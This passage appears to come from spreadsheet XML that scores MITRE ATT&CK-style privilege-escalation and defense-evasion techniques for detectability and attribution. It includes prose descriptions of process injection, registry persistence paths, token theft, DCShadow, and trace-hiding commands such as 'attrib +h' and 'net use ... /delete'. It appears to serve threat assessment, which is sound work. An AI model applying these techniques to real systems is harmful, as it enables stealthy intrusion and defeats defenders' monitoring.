    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Privilege Escalation"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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_x000a__x000a_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
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Extra Window Memory Injection"/>
    <x v="5"/>
    <x v="8"/>
    <s v="Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.4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n v="0"/>
    <s v="Very hard to detect due to the specifics of the attack"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File System Permissions Weakness"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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n v="1"/>
    <s v="Local IDS may pick up on hash changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Image File Execution Options Injection"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1_x000a__x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation._x000a__x000a_Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="New Service"/>
    <x v="5"/>
    <x v="8"/>
    <s v="When operating systems boot up, they can start programs or applications called services that perform background system functions.1 A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry._x000a__x000a_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
    <n v="2"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Path Interception"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_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n v="2"/>
    <s v="Multiple indicators"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Port Monitors"/>
    <x v="5"/>
    <x v="8"/>
    <s v="A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.2 Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following:_x000a__x000a_Local Port_x000a_Standard TCP/IP Port_x000a_USB Monitor_x000a_WSD Port_x000a_Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM."/>
    <n v="2"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Process Injection"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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_x000a_There are multiple approaches to injecting code into a live process. Windows implementations include:1_x000a__x000a_Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread._x000a_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2_x000a_Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended._x000a_Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue3 of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing 4 is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.5_x000a_Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point.6"/>
    <n v="0"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="SID-History Injection"/>
    <x v="5"/>
    <x v="8"/>
    <s v="The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.1 An account can hold additional SIDs in the SID-History Active Directory attribute2, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens)._x000a__x000a_Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values3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 Windows Admin Shares, or Windows Remote Management."/>
    <n v="3"/>
    <s v="System events are raised"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Scheduled Task"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Service Registry Permissions Weakness"/>
    <x v="5"/>
    <x v="8"/>
    <s v="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1_x000a__x000a_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_x000a__x000a_Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted."/>
    <n v="1"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Access Token Manipulation"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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runas. 1_x000a__x000a_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2_x000a__x000a_Access tokens can be leveraged by adversaries through three methods:3_x000a__x000a_Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system._x000a__x000a_Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user._x000a__x000a_Make and Impersonate Token -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_x000a__x000a_Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account._x000a__x000a_Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. 4 The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. 5"/>
    <n v="1"/>
    <s v="Detectionrisk is low due to advanced monitoring of individual machines"/>
    <n v="0"/>
    <s v="Does not disclose attacker"/>
    <n v="0"/>
    <s v="Does not disclose mission details"/>
  </r>
  <r>
    <s v="BITS Jobs"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2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_x000a__x000a_The interface to create and manage BITS jobs is accessible through PowerShell 2 and the BITSAdmin tool.3_x000a__x000a_Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).74_x000a__x000a_BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol."/>
    <n v="3"/>
    <s v="Standard tooling is used, which may lead to logs/audit trails"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Binary Padding"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="CMSTP"/>
    <x v="6"/>
    <x v="9"/>
    <s v="The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.1 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections._x000a__x000a_Adversaries may supply CMSTP.exe with INF files infected with malicious commands.2 Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs3 and/or COM scriptlets (SCT) from remote servers.45 This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application._x000a__x000a_CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface"/>
    <n v="1"/>
    <s v="Very hard to detect, inf files may reside"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Code Signing"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.1 However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries2. The certificates used during an operation may be created, forged, or stolen by the adversary.34_x000a__x000a_Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.1_x000a__x000a_Code signing certificates may be used to bypass security policies that require signed code to execute on a system."/>
    <n v="1"/>
    <s v="Discrepancy between certificate owner/issuer and expected certified products may be indication"/>
    <n v="2"/>
    <s v="Certificates are identifiable to organisation"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Firmware"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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
    <n v="1"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Object Model Hijacking"/>
    <x v="6"/>
    <x v="9"/>
    <s v="The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.1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2 An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection."/>
    <n v="2"/>
    <s v="Disk and registry altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DCShadow"/>
    <x v="6"/>
    <x v="9"/>
    <s v="DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC).12 Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys._x000a__x000a_Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.3_x000a__x000a_This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors).1 The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Side-Loading"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests1 are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.2_x000a__x000a_Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process."/>
    <n v="1"/>
    <s v="Unusual activity within the process could be observed"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Search Order Hijacking"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Windows systems use a common method to look for required DLLs to load into a program.1 Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence._x000a__x000a_Adversaries may perform DLL preloading, also called binary planting attacks,2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3 Adversaries may use this behavior to cause the program to load a malicious DLL._x000a__x000a_Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.456_x000a__x000a_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_x000a__x000a_Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace."/>
    <n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Deobfuscate/Decode Files or Information"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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Scripting, PowerShell, or by using utilities present on the system._x000a__x000a_One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.1_x000a__x000a_Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.2_x000a__x000a_Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with Obfuscated Files or Information during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.3 Adversaries may also used compressed or archived scripts, such as Javascript."/>
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="1"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
    <n v="3"/>
    <s v="Harder to decode than regular encoding but decodable without secret"/>
  </r>
  <r>
    <s v="Disabling Security Tools"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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
    <n v="4"/>
    <s v="User may miss software running (such as Antivirus)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Defense Evasion"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection."/>
    <n v="0"/>
    <s v="Very hard to detect, instability may be an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Extra Window Memory Injection"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.4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n v="0"/>
    <s v="Very hard to detect due to the specifics of the attack"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File Deletion"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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_x000a__x000a_There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools."/>
    <n v="0"/>
    <s v="Del commands are not detected, secure wipes removes evidence "/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File System Logical Offsets"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools.1_x000a__x000a_Utilities, such as NinjaCopy, exist to perform these actions in PowerShell."/>
    <n v="1"/>
    <s v="Looking for opening of handles to drive volumes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hidden Files and Directories"/>
    <x v="6"/>
    <x v="9"/>
    <s v="To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. _x000a_Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”."/>
    <n v="3"/>
    <s v="Hidden files can easily be detected by automated tools"/>
    <n v="1"/>
    <s v="File may indicate importance to attacker"/>
    <n v="2"/>
    <s v="File may indicate importance to attacker"/>
  </r>
  <r>
    <s v="Image File Execution Options Injection"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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1_x000a__x000a_IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1_x000a__x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation._x000a__x000a_Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Indicator Blocking"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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
    <n v="3"/>
    <s v="Lack of information coming from sensor"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Indicator Removal from Tools"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
    <n v="1"/>
    <s v="N/A"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Indicator Removal on Host"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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
    <n v="3"/>
    <s v="Lack of events on system is an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Indirect Command Execution"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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Line Interface, Run window, or via scripts.12_x000a__x000a_Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Install Root Certificate"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.1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_x000a__x000a_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2_x000a__x000a_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n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="InstallUtil"/>
    <x v="6"/>
    <x v="9"/>
    <s v="InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.1 InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft._x000a__x000a_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
    <n v="2"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Masquerading"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed._x000a__x000a_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_x000a_In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe.1 An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths.2_x000a__x000a_An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binares include &quot;explorer.exe&quot; and &quot;svchost.exe&quot;."/>
    <n v="2"/>
    <s v="Hash values will not be correct"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Modify Registry"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution._x000a__x000a_Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification.1 Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples)._x000a__x000a_The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system.2 Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication."/>
    <n v="1"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Mshta"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.1 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.2_x000a__x000a_Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567_x000a__x000a_Files may be executed by mshta.exe through an inline script: mshta "/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="3"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="1"/>
    <s v="Attacker server may hint towards mission's target"/>
  </r>
  <r>
    <s v="NTFS File Attributes"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.1 Within MFT entries are file attributes,2 such as Extended Attributes (EA) and Data [known as Alternative Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).1345_x000a__x000a_Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus."/>
    <n v="1"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Share Connection Removal"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\share /delete command.1_x000a__x000a_Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation."/>
    <n v="3"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Obfuscated Files or Information"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses._x000a__x000a_Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.1 Adversaries may also used compressed or archived scripts, such as Javascript._x000a__x000a_Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.2 Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.3_x000a__x000a_Adversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms.456_x000a__x000a_Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server.7 By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary."/>
    <n v="1"/>
    <s v="N/A"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Doppelgänging"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.1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2 To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.3_x000a__x000a_Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.4_x000a__x000a_Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing,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4_x000a__x000a_Process Doppelgänging is implemented in 4 steps4:_x000a__x000a_Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction._x000a_Load – Create a shared section of memory and load the malicious executable._x000a_Rollback – Undo changes to original executable, effectively removing malicious code from the file system._x000a_Animate – Create a process from the tainted section of memory and initiate execution."/>
    <n v="2"/>
    <s v="Outdated process for proces invocation can be detected"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Hollowing"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to Process Injection, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis."/>
    <n v="0"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Injection"/>
    <x v="6"/>
    <x v="9"/>
    <s v="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_x000a_There are multiple approaches to injecting code into a live process. Windows implementations include:1_x000a__x000a_Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread._x000a_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2_x000a_Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended._x000a_Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue3 of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing 4 is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.5_x000a_Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point."/>
    <n v="0"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Regsvcs/Regasm"/>
    <x v="6"/>
    <x v="9"/>
    <s v="Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.12_x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Regsvr32"/>
    <x v="6"/>
    <x v="9"/>
